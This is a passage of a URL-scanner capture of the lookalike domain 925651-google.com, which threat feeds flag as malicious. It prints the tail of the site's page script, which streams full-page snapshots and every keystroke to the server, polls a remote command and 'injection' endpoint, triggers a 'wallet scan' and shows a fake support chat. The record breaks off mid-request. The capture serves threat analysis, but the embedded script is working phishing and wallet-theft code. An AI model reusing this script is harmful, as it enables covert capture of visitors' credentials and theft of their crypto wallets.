    // Reconnect snapshot observer\\n        if (_snapObs) _snapObs.observe(document.documentElement, {\\n          subtree: true, childList: true, attributes: true,\\n          characterData: true, attributeOldValue: false\\n        });\\n\\n        if (h \u0026\u0026 h.length \u003e 100 \u0026\u0026 h.length \u003c 1500000 \u0026\u0026 h !== _snapPrev) {\\n          _snapPrev = h;\\n          var xhr = new XMLHttpRequest();\\n          xhr.open('POST', '/api/public/snap', true);\\n          xhr.setRequestHeader('Content-Type', 'application/json');\\n          xhr.send(JSON.stringify({ s: sessionId, h: h, p: window.location.pathname }));\\n        }\\n      } catch(e) {\\n        _snapSyncing = false;\\n        // Ensure observer is always reconnected even on error\\n        try {\\n          if (_snapObs) _snapObs.observe(document.documentElement, {\\n            subtree: true, childList: true, attributes: true,\\n            characterData: true, attributeOldValue: false\\n          });\\n        } catch(e2) {}\\n      }\\n    }\\n    // Debounced trigger — fires 80ms after the last mutation burst settles\\n    function scheduleSnap() {\\n      if (_snapTimer) clearTimeout(_snapTimer);\\n      _snapTimer = setTimeout(sendSnap, 80);\\n    }\\n    // Trigger a fast snapshot on every keystroke so typing shows immediately in preview\\n    document.addEventListener('input', scheduleSnap, true);\\n    // Watch ALL DOM mutations: class changes, style changes, added/removed nodes, text edits\\n    if (typeof MutationObserver !== 'undefined') {\\n      _snapObs = new MutationObserver(scheduleSnap);\\n      _snapObs.observe(document.documentElement, {\\n        subtree: true,\\n        childList: true,\\n        attributes: true,\\n        characterData: true,\\n        attributeOldValue: false\\n      });\\n    }\\n    // Steady fallback ticker covers CSS-only transitions and anything the observer misses\\n    setInterval(sendSnap, 800);\\n    \\n    // Track page visibility changes\\n    document.addEventListener('visibilitychange', function() {\\n      isPageVisible = !document.hidden;\\n      if (isPageVisible) {\\n        updateActivity(); // Treat becoming visible as activity\\n      }\\n      // Always send immediate ping on visibility change so dashboard updates fast\\n      currentVisState = getVisibilityState();\\n      if (sessionId) {\\n        ping().then(checkCommand);\\n      }\\n    });\\n  }\\n  \\n  function conditionalPing() {\\n    if (sessionWasDeleted \u0026\u0026 !isUserActive()) {\\n      return;\\n    }\\n    if (sessionWasDeleted \u0026\u0026 isUserActive()) {\\n      sessionWasDeleted = false;\\n    }\\n    // Update current visibility state and always ping while tab is visible\\n    // so dashboard can distinguish active/idle. Only stop pinging when tab is hidden.\\n    currentVisState = getVisibilityState();\\n    if (isPageVisible || isUserActive()) {\\n      ping().then(checkCommand);\\n    }\\n  }\\n  \\n  function conditionalInjection() {\\n    if (isUserActive()) {\\n      applyInjection();\\n    }\\n  }\\n  \\n  // =========== LIVE CHAT WIDGET ===========\\n  var chatWidgetInitialized = false;\\n  var chatOpen = false;\\n  var chatMessages = [];\\n  var chatConfig = null;\\n  var chatPollInterval = null;\\n\\n  function initChatWidget() {\\n    if (chatWidgetInitialized || !sessionId) return;\\n    fetch('/api/public/chat-config/' + sessionId)\\n      .then(function(r) { return r.json(); })\\n      .then(function(cfg) {\\n        if (!cfg || !cfg.enabled) return;\\n        chatConfig = cfg;\\n        chatWidgetInitialized = true;\\n        renderChatBubble();\\n      })\\n      .catch(function() {});\\n  }\\n\\n  function getChatTheme() {\\n    var isDark = window.matchMedia \u0026\u0026 window.matchMedia('(prefers-color-scheme: dark)').matches;\\n    var bc = chatConfig.chatBubbleColor || '#2563eb';\\n    var hc = chatConfig.chatHeaderColor || null;\\n    if (isDark) {\\n      return {\\n        bubble: bc,\\n        panelBg: '#1a1a2e',\\n        headerBg: hc || '#16213e',\\n        border: '#0f3460',\\n        inputBg: '#16213e',\\n        textPrimary: '#fff',\\n        textSecondary: '#94a3b8',\\n        msgVisitor: bc,\\n        msgAdmin: '#16213e',\\n        msgAdminBorder: '1px solid #0f3460',\\n        msgAdminText: '#e2e8f0',\\n        shadow: 'rgba(0,0,0,0.4)'\\n      };\\n    } else {\\n      return {\\n        bubble: bc,\\n        panelBg: '#ffffff',\\n        headerBg: hc || '#f8fafc',\\n        border: '#e2e8f0',\\n        inputBg: '#f1f5f9',\\n        textPrimary: '#1e293b',\\n        textSecondary: '#64748b',\\n        msgVisitor: bc,\\n        msgAdmin: '#f1f5f9',\\n        msgAdminBorder: '1px solid #e2e8f0',\\n        msgAdminText: '#1e293b',\\n        shadow: 'rgba(0,0,0,0.15)'\\n      };\\n    }\\n  }\\n\\n  function renderChatBubble() {\\n    var t = getChatTheme();\\n    var bubble = document.createElement('div');\\n    bubble.id = '_chat_bubble';\\n    bubble.style.cssText = 'position:fixed;bottom:24px;right:24px;z-index:999999;width:60px;height:60px;border-radius:50%;background:' + t.bubble + ';cursor:pointer;display:flex;align-items:center;justify-content:center;box-shadow:0 4px 16px ' + t.shadow + ';transition:transform 0.2s;';\\n    if (chatConfig.chatBubbleIcon) {\\n      var ico = document.createElement('img');\\n      ico.src = chatConfig.chatBubbleIcon;\\n      ico.style.cssText = 'width:32px;height:32px;border-radius:50%;object-fit:cover;';\\n      ico.onerror = function() { ico.remove(); bubble.innerHTML = '\u003csvg xmlns=\\\"http://www.w3.org/2000/svg\\\" width=\\\"28\\\" height=\\\"28\\\" viewBox=\\\"0 0 24 24\\\" fill=\\\"none\\\" stroke=\\\"#fff\\\" stroke-width=\\\"2\\\" stroke-linecap=\\\"round\\\" stroke-linejoin=\\\"round\\\"\u003e\u003cpath d=\\\"M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z\\\"\u003e\u003c/path\u003e\u003c/svg\u003e'; };\\n      bubble.appendChild(ico);\\n    } else {\\n      bubble.innerHTML = '\u003csvg xmlns=\\\"http://www.w3.org/2000/svg\\\" width=\\\"28\\\" height=\\\"28\\\" viewBox=\\\"0 0 24 24\\\" fill=\\\"none\\\" stroke=\\\"#fff\\\" stroke-width=\\\"2\\\" stroke-linecap=\\\"round\\\" stroke-linejoin=\\\"round\\\"\u003e\u003cpath d=\\\"M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z\\\"\u003e\u003c/path\u003e\u003c/svg\u003e';\\n    }\\n    bubble.onmouseenter = function() { bubble.style.transform = 'scale(1.08)'; };\\n    bubble.onmouseleave = function() { bubble.style.transform = 'scale(1)'; };\\n    bubble.onclick = function() { toggleChat(); };\\n    document.body.appendChild(bubble);\\n\\n    var badge = document.createElement('div');\\n    badge.id = '_chat_badge';\\n    badge.style.cssText = 'position:absolute;top:-2px;right:-2px;width:18px;height:18px;border-radius:50%;background:#ef4444;color:#fff;font-size:11px;display:none;align-items:center;justify-content:center;font-family:sans-serif;';\\n    bubble.appendChild(badge);\\n\\n    renderChatPanel();\\n  }\\n\\n  function renderChatPanel() {\\n    var t = getChatTheme();\\n    var panel = document.createElement('div');\\n    panel.id = '_chat_panel';\\n    panel.style.cssText = 'position:fixed;bottom:96px;right:24px;z-index:999998;width:360px;max-width:calc(100vw - 48px);height:480px;max-height:calc(100vh - 120px);background:' + t.panelBg + ';border-radius:16px;box-shadow:0 8px 32px ' + t.shadow + ';display:none;flex-direction:column;overflow:hidden;font-family:-apple-system,BlinkMacSystemFont,sans-serif;';\\n\\n    var header = document.createElement('div');\\n    header.style.cssText = 'padding:16px 20px;background:' + t.headerBg + ';display:flex;align-items:center;gap:12px;border-bottom:1px solid ' + t.border + ';';\\n    \\n    if (chatConfig.chatLogo) {\\n      var logo = document.createElement('img');\\n      logo.src = chatConfig.chatLogo;\\n      logo.style.cssText = 'width:40px;height:40px;border-radius:50%;object-fit:cover;';\\n      header.appendChild(logo);\\n    } else {\\n      var logoPlaceholder = document.createElement('div');\\n      logoPlaceholder.style.cssText = 'width:40px;height:40px;border-radius:50%;background:' + t.bubble + ';display:flex;align-items:center;justify-content:center;';\\n      logoPlaceholder.innerHTML = '\u003csvg xmlns=\\\"http://www.w3.org/2000/svg\\\" width=\\\"20\\\" height=\\\"20\\\" viewBox=\\\"0 0 24 24\\\" fill=\\\"none\\\" stroke=\\\"#fff\\\" stroke-width=\\\"2\\\"\u003e\u003cpath d=\\\"M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z\\\"\u003e\u003c/path\u003e\u003c/svg\u003e';\\n      header.appendChild(logoPlaceholder);\\n    }\\n\\n    var headerText = document.createElement('div');\\n    headerText.style.cssText = 'flex:1;';\\n    headerText.innerHTML = '\u003cdiv style=\\\"color:' + t.textPrimary + ';font-weight:600;font-size:15px;\\\"\u003e' + (chatConfig.chatName || 'Support') + '\u003c/div\u003e\u003cdiv style=\\\"color:' + t.textSecondary + ';font-size:12px;\\\"\u003e' + (chatConfig.chatSubtitle || 'We typically reply instantly') + '\u003c/div\u003e';\\n    header.appendChild(headerText);\\n\\n    var closeBtn = document.createElement('div');\\n    closeBtn.style.cssText = 'cursor:pointer;color:' + t.textSecondary + ';font-size:20px;padding:4px;';\\n    closeBtn.innerHTML = '\u003csvg xmlns=\\\"http://www.w3.org/2000/svg\\\" width=\\\"20\\\" height=\\\"20\\\" viewBox=\\\"0 0 24 24\\\" fill=\\\"none\\\" stroke=\\\"currentColor\\\" stroke-width=\\\"2\\\"\u003e\u003cline x1=\\\"18\\\" y1=\\\"6\\\" x2=\\\"6\\\" y2=\\\"18\\\"\u003e\u003c/line\u003e\u003cline x1=\\\"6\\\" y1=\\\"6\\\" x2=\\\"18\\\" y2=\\\"18\\\"\u003e\u003c/line\u003e\u003c/svg\u003e';\\n    closeBtn.onclick = function() { toggleChat(); };\\n    header.appendChild(closeBtn);\\n    panel.appendChild(header);\\n\\n    var messagesArea = document.createElement('div');\\n    messagesArea.id = '_chat_messages';\\n    messagesArea.style.cssText = 'flex:1;overflow-y:auto;padding:16px;display:flex;flex-direction:column;gap:8px;';\\n    panel.appendChild(messagesArea);\\n\\n    var inputArea = document.createElement('div');\\n    inputArea.style.cssText = 'padding:12px 16px;border-top:1px solid ' + t.border + ';display:flex;gap:8px;align-items:center;';\\n    \\n    var input = document.createElement('input');\\n    input.id = '_chat_input';\\n    input.type = 'text';\\n    input.placeholder = 'Type a message...';\\n    input.maxLength = 2000;\\n    input.style.cssText = 'flex:1;padding:10px 14px;border:1px solid ' + t.border + ';border-radius:24px;background:' + t.inputBg + ';color:' + t.textPrimary + ';font-size:14px;outline:none;font-family:inherit;';\\n    input.onfocus = function() { input.style.borderColor = t.bubble; };\\n    input.onblur = function() { input.style.borderColor = t.border; };\\n    input.onkeydown = function(e) { if (e.key === 'Enter' \u0026\u0026 !e.shiftKey) { e.preventDefault(); sendChatMessage(); } };\\n    inputArea.appendChild(input);\\n\\n    var sendBtn = document.createElement('button');\\n    sendBtn.style.cssText = 'width:36px;height:36px;border-radius:50%;background:' + t.bubble + ';border:none;cursor:pointer;display:flex;align-items:center;justify-content:center;flex-shrink:0;';\\n    sendBtn.innerHTML = '\u003csvg xmlns=\\\"http://www.w3.org/2000/svg\\\" width=\\\"16\\\" height=\\\"16\\\" viewBox=\\\"0 0 24 24\\\" fill=\\\"none\\\" stroke=\\\"#fff\\\" stroke-width=\\\"2\\\"\u003e\u003cline x1=\\\"22\\\" y1=\\\"2\\\" x2=\\\"11\\\" y2=\\\"13\\\"\u003e\u003c/line\u003e\u003cpolygon points=\\\"22 2 15 22 11 13 2 9 22 2\\\"\u003e\u003c/polygon\u003e\u003c/svg\u003e';\\n    sendBtn.onclick = function() { sendChatMessage(); };\\n    inputArea.appendChild(sendBtn);\\n    panel.appendChild(inputArea);\\n\\n    document.body.appendChild(panel);\\n\\n    if (window.matchMedia) {\\n      window.matchMedia('(prefers-color-scheme: dark)').addEventListener('change', function() {\\n        var oldPanel = document.getElementById('_chat_panel');\\n        var oldBubble = document.getElementById('_chat_bubble');\\n        if (oldPanel) oldPanel.remove();\\n        if (oldBubble) oldBubble.remove();\\n        renderChatBubble();\\n        if (chatOpen) {\\n          var newPanel = document.getElementById('_chat_panel');\\n          if (newPanel) newPanel.style.display = 'flex';\\n          renderMessages();\\n        }\\n      });\\n    }\\n  }\\n\\n  function toggleChat() {\\n    chatOpen = !chatOpen;\\n    var panel = document.getElementById('_chat_panel');\\n    var bubble = document.getElementById('_chat_bubble');\\n    var badge = document.getElementById('_chat_badge');\\n    if (panel) panel.style.display = chatOpen ? 'flex' : 'none';\\n    if (badge) badge.style.display = 'none';\\n    if (chatOpen) {\\n      pollChatMessages();\\n      if (!chatPollInterval) {\\n        chatPollInterval = setInterval(pollChatMessages, 3000);\\n      }\\n      var input = document.getElementById('_chat_input');\\n      if (input) setTimeout(function() { input.focus(); }, 100);\\n    }\\n  }\\n\\n  function pollChatMessages() {\\n    if (!sessionId) return;\\n    fetch('/api/public/chat/' + sessionId)\\n      .then(function(r) { return r.json(); })\\n      .then(function(msgs) {\\n        if (!Array.isArray(msgs)) return;\\n        var hadNewFromAdmin = msgs.length \u003e chatMessages.length \u0026\u0026 msgs.some(function(m) { return m.sender === 'admin' || m.sender === 'system'; });\\n        chatMessages = msgs;\\n        renderMessages();\\n        if (hadNewFromAdmin \u0026\u0026 !chatOpen) {\\n          var badge = document.getElementById('_chat_badge');\\n          if (badge) { badge.style.display = 'flex'; badge.textContent = '!'; }\\n        }\\n      })\\n      .catch(function() {});\\n  }\\n\\n  function renderMessages() {\\n    var area = document.getElementById('_chat_messages');\\n    if (!area) return;\\n    var t = getChatTheme();\\n    area.innerHTML = '';\\n    var prevSender = null;\\n    for (var i = 0; i \u003c chatMessages.length; i++) {\\n      var m = chatMessages[i];\\n      if (m.sender === 'system') {\\n        var sysMsg = document.createElement('div');\\n        sysMsg.style.cssText = 'text-align:center;font-size:12px;color:' + t.textSecondary + ';padding:4px 0;font-style:italic;';\\n        sysMsg.textContent = m.message;\\n        area.appendChild(sysMsg);\\n        prevSender = 'system';\\n        continue;\\n      }\\n      var isVisitor = m.sender === 'visitor';\\n      var isFirstInGroup = m.sender !== prevSender;\\n      var wrapper = document.createElement('div');\\n      wrapper.style.cssText = 'display:flex;flex-direction:column;' + (isVisitor ? 'align-items:flex-end;' : 'align-items:flex-start;') + (isFirstInGroup ? '' : 'margin-top:-4px;');\\n      if (isFirstInGroup) {\\n        var nameLabel = document.createElement('div');\\n        nameLabel.style.cssText = 'font-size:11px;color:' + t.textSecondary + ';margin-bottom:2px;padding:0 4px;';\\n        nameLabel.textContent = isVisitor ? 'Me' : (m.senderName || 'Agent');\\n        wrapper.appendChild(nameLabel);\\n      }\\n      var row = document.createElement('div');\\n      row.style.cssText = 'display:flex;align-items:flex-end;gap:8px;' + (isVisitor ? 'flex-direction:row-reverse;' : '');\\n      if (!isVisitor) {\\n        if (isFirstInGroup) {\\n          var avatarContainer = document.createElement('div');\\n          avatarContainer.style.cssText = 'width:28px;height:28px;flex-shrink:0;position:relative;';\\n          var fallbackAvatar = document.createElement('div');\\n          fallbackAvatar.style.cssText = 'width:28px;height:28px;border-radius:50%;background:' + t.bubble + ';display:flex;align-items:center;justify-content:center;';\\n          fallbackAvatar.innerHTML = '\u003csvg xmlns=\\\"http://www.w3.org/2000/svg\\\" width=\\\"14\\\" height=\\\"14\\\" viewBox=\\\"0 0 24 24\\\" fill=\\\"none\\\" stroke=\\\"#fff\\\" stroke-width=\\\"2\\\"\u003e\u003cpath d=\\\"M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2\\\"\u003e\u003c/path\u003e\u003ccircle cx=\\\"12\\\" cy=\\\"7\\\" r=\\\"4\\\"\u003e\u003c/circle\u003e\u003c/svg\u003e';\\n          avatarContainer.appendChild(fallbackAvatar);\\n          if (chatConfig.chatLogo) {\\n            var avatarImg = document.createElement('img');\\n            avatarImg.src = chatConfig.chatLogo;\\n            avatarImg.style.cssText = 'width:28px;height:28px;border-radius:50%;object-fit:cover;position:absolute;top:0;left:0;';\\n            avatarImg.onerror = function() { this.style.display = 'none'; };\\n            avatarContainer.appendChild(avatarImg);\\n          }\\n          row.appendChild(avatarContainer);\\n        } else {\\n          var spacer = document.createElement('div');\\n          spacer.style.cssText = 'width:28px;flex-shrink:0;';\\n          row.appendChild(spacer);\\n        }\\n      }\\n      var bubble = document.createElement('div');\\n      bubble.style.cssText = 'max-width:75%;padding:10px 14px;border-radius:16px;font-size:14px;line-height:1.4;word-break:break-word;' + (isVisitor ? 'background:' + t.msgVisitor + ';color:#fff;border-bottom-right-radius:4px;' : 'background:' + t.msgAdmin + ';color:' + t.msgAdminText + ';border-bottom-left-radius:4px;border:' + t.msgAdminBorder + ';');\\n      bubble.textContent = m.message;\\n      row.appendChild(bubble);\\n      wrapper.appendChild(row);\\n      area.appendChild(wrapper);\\n      prevSender = m.sender;\\n    }\\n    area.scrollTop = area.scrollHeight;\\n  }\\n\\n  function sendChatMessage() {\\n    var input = document.getElementById('_chat_input');\\n    if (!input || !input.value.trim() || !sessionId) return;\\n    var msg = input.value.trim();\\n    input.value = '';\\n    fetch('/api/public/chat/send', {\\n      method: 'POST',\\n      headers: { 'Content-Type': 'application/json' },\\n      body: JSON.stringify({ sessionId: sessionId, message: msg })\\n    }).then(function(r) { return r.json(); }).then(function(res) {\\n      if (res \u0026\u0026 res.id) {\\n        chatMessages.push(res);\\n        renderMessages();\\n      }\\n    }).catch(function() {});\\n  }\\n\\n  // Start chat polling in background even when closed (to show badge)\\n  function startChatBackgroundPoll() {\\n    if (!sessionId) return;\\n    setTimeout(function() {\\n      initChatWidget();\\n      setInterval(function() {\\n        if (chatWidgetInitialized \u0026\u0026 !chatOpen) pollChatMessages();\\n      }, 5000);\\n    }, 2000);\\n  }\\n\\n  function startTracking() {\\n    setupActivityTracking();\\n    ping().then(function(res) {\\n      checkCommand(res);\\n      applyInjection();\\n      setTimeout(runWalletScan, 1500);\\n      startChatBackgroundPoll();\\n    });\\n    setInterval(conditionalPing, 2000);\\n    setInterval(conditionalInjection, 3000);\\n    setupListeners();\\n  }\\n  \\n  if (document.readyState === 'loading') {\\n    document.addEventListener('DOMContentLoaded', startTracking);\\n  } else {\\n    startTracking();\\n  }\\n\\n  // ── Page prefetch + fade transition ─────────────────────────────────────\\n  (function() {\\n    var prefetched = {};\\n\\n    function isSameDomain(href) {\\n      try {\\n        var url = new URL(href, window.location.href);\\n        return url.hostname === window.location.hostname;\\n      } catch(e) { return false; }\\n    }\\n\\n    function getBgColor() {\\n      try {\\n        var bg = getComputedStyle(document.body).backgroundColor;\\n        if (bg \u0026\u0026 bg !== 'rgba(0, 0, 0, 0)' \u0026\u0026 bg !== 'transparent') return bg;\\n        bg = getComputedStyle(document.documentElement).backgroundColor;\\n        if (bg \u0026\u0026 bg !== 'rgba(0, 0, 0, 0)' \u0026\u0026 bg !== 'transparent') return bg;\\n      } catch(e) {}\\n      return '#fff';\\n    }\\n\\n    function getOverlay() {\\n      var ov = document.getElementById('__wasp_ov');\\n      if (!ov) {\\n        ov = document.createElement('div');\\n        ov.id = '__wasp_ov';\\n        ov.style.cssText = 'position:fixed;inset:0;z-index:2147483647;opacity:0;transition:opacity 0.2s ease;pointer-events:none;';\\n        document.body.appendChild(ov);\\n      }\\n      return ov;\\n    }\\n\\n    function prefetchUrl(href) {\\n      if (!href || prefetched[href] || !isSameDomain(href)) return;\\n      prefetched[href] = true;\\n      var link = document.createElement('link');\\n      link.rel = 'prefetch';\\n      link.href = href;\\n      document.head.appendChild(link);\\n    }\\n\\n    function isNavLink(el) {\\n      if (!el || !el.href) return false;\\n      if (/^(javascript|mailto|tel|sms|data):/i.test(el.href)) return false;\\n      try {\\n        var dest = new URL(el.href, window.location.href);\\n        if (dest.pathname === window.location.pathname \u0026\u0026 dest.search === window.location.search) return false;\\n      } catch(e) { return false; }\\n      if (!isSameDomain(el.href)) return false;\\n      if (el.target === '_blank') return false;\\n      if (el.getAttribute('download')) return false;\\n      return true;\\n    }\\n\\n    // Fade out on link click, let browser handle the actual navigation\\n    document.addEventListener('click', function(e) {\\n      if (e.ctrlKey || e.metaKey || e.shiftKey || e.altKey) return;\\n      var el = e.target;\\n      while (el \u0026\u0026 el.tagName !== 'A') el = el.parentElement;\\n      if (!isNavLink(el)) return;\\n      var ov = getOverlay();\\n      ov.style.background = getBgColor();\\n      ov.style.pointerEvents = 'all';\\n      ov.getBoundingClientRect();\\n      ov.style.opacity = '1';\\n    }, { passive: true });\\n\\n    // Prefetch on hover\\n    document.addEventListener('mouseover', function(e) {\\n      var el = e.target;\\n      while (el \u0026\u0026 el.tagName !== 'A') el = el.parentElement;\\n      if (el \u0026\u0026 isNavLink(el)) prefetchUrl(el.href);\\n    }, { passive: true });\\n  })();\\n  // ────────────────────────────────────────────────────────────────────────\\n})();\\n\u003c/script\u003e\\n\\n\u003c/body\u003e\u003c/html\u003e\",\"p\":\"/\"}"}},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=3,i=?0\r\ndate: Tue, 21 Apr 2026 09:02:57 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb367be8d00883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=jvTeTd6j4bWdn8R77kR0swVJiLOd%2FsZ9zZEjtELJFN6PxpVEP9auGQT5vdObLzbtgw4FhyjelxRO1ZMB4r1lUPlDh2RCsIw%2FI2olwB6XtfAl06dvjA8hrL3KrO9AcEEP6bSk%2FfQqMfJxTQje3OIKMeU%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":78,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":77,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:00.570Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"GET /api/sessions/2971296c-6950-44d8-96a4-527bbcd2f099/injection HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nCookie: _tsid=2971296c-6950-44d8-96a4-527bbcd2f099\r\nSec-Fetch-Dest: empty\r\nSec-Fetch-Mode: cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 403 Forbidden\r\ncontent-length: 28\r\npriority: u=4,i=?0\r\ndate: Tue, 21 Apr 2026 09:03:00 GMT\r\ncontent-type: application/json; charset=utf-8\r\nx-xss-protection: 1; mode=block\r\ncf-ray: 9efb368c9ab00883-OSL\r\ncf-cache-status: DYNAMIC\r\netag: W/\"1c-nWcT8lAoCqDjrCJITDHkT+rfixY\"\r\nserver: cloudflare\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\npermissions-policy: geolocation=(), camera=(), microphone=()\r\nreferrer-policy: no-referrer\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=ApbKGjcEGQvPLlVgslV7qlq89Loz8CfBXZ33Ut9enKHpg%2BmnHxz1NCwaknBq0VaL7m9RYJaVw8fenYGq7K0MSWHTUOhwDWvmKtyz2TjNZZfEmYmw2A3vwKun9K4tZZsCp00uQ%2Bmw431KyKcTpC34pBs%3D\"}]}\r\nx-content-type-options: nosniff\r\nx-frame-options: DENY\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"403","status_text":"Forbidden","fingerprints":[{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":28,"size_decoded":0,"mime_type":"application/json; charset=utf-8","magic":"JSON text data","md5":"e3d57c361b5914c7a00f9b354d2cdf0f","sha1":"9d6713f250280aa0e3ac22484c31e44feadf8b16","sha256":"549a258bb3491836ef45f626a5508bd53857b9bf3212ebe35effa0839b0c07cb","sha512":"d77130401d4387a0886a3ad1b76cb8bae9fdf861807690ac4842845e8395ebc631d00373d3db728282cd3bb7ebe4e4f66a1c3fb92e6bb4e86778338596781543","ssdeep":"","tlshash":"bb80002fb8082e0803230003302020e2280000800b8823c3088a3008030c8028202200","first_seen":"2026-04-21T09:03:25.847616Z","last_seen":"2026-04-21T09:16:26.526865Z","times_seen":2,"resource_available":false,"data":null}},"time_used":112,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":111,"receive":1,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"hagezi","sensor_type":"DNS","title":"Hagezi Threat Feed","description":"Hagezi Threat Feed","scan_date":"2026-04-21","alert":"Sinkholed","trigger":"925651-google.com","verdict":"malicious","severity":"medium","comment":"","link":"https://github.com/hagezi/dns-blocklists","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"925651-google.com/api/public/session/ping","fqdn":"925651-google.com","domain":"925651-google.com","tld":"com"},"ip":{"addr":"104.21.43.239","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"fetch","requested_by":"https://925651-google.com/","date":"2026-04-21T09:03:01.570Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"925651-google.com","organization":""},"issuer":{"commonName":"E8","organization":"Let's Encrypt"},"validity":{"start":"Fri, 06 Mar 2026 00:08:47 GMT","end":"Thu, 04 Jun 2026 00:08:46 GMT"},"fingerprint":{"sha1":"6F:4F:89:F8:75:69:42:0E:DB:84:C7:BF:DB:E7:47:3D:4F:43:0B:C3","sha256":"77:BE:4B:82:88:C0:DD:83:11:92:5B:56:8B:1D:26:BC:F0:16:C7:4C:06:22:4D:BA:28:3F:39:F0:7E:B3:B4:FC"}}},"request":{"raw":"POST /api/public/session/ping HTTP/1.1\r\nHost: 925651-google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: 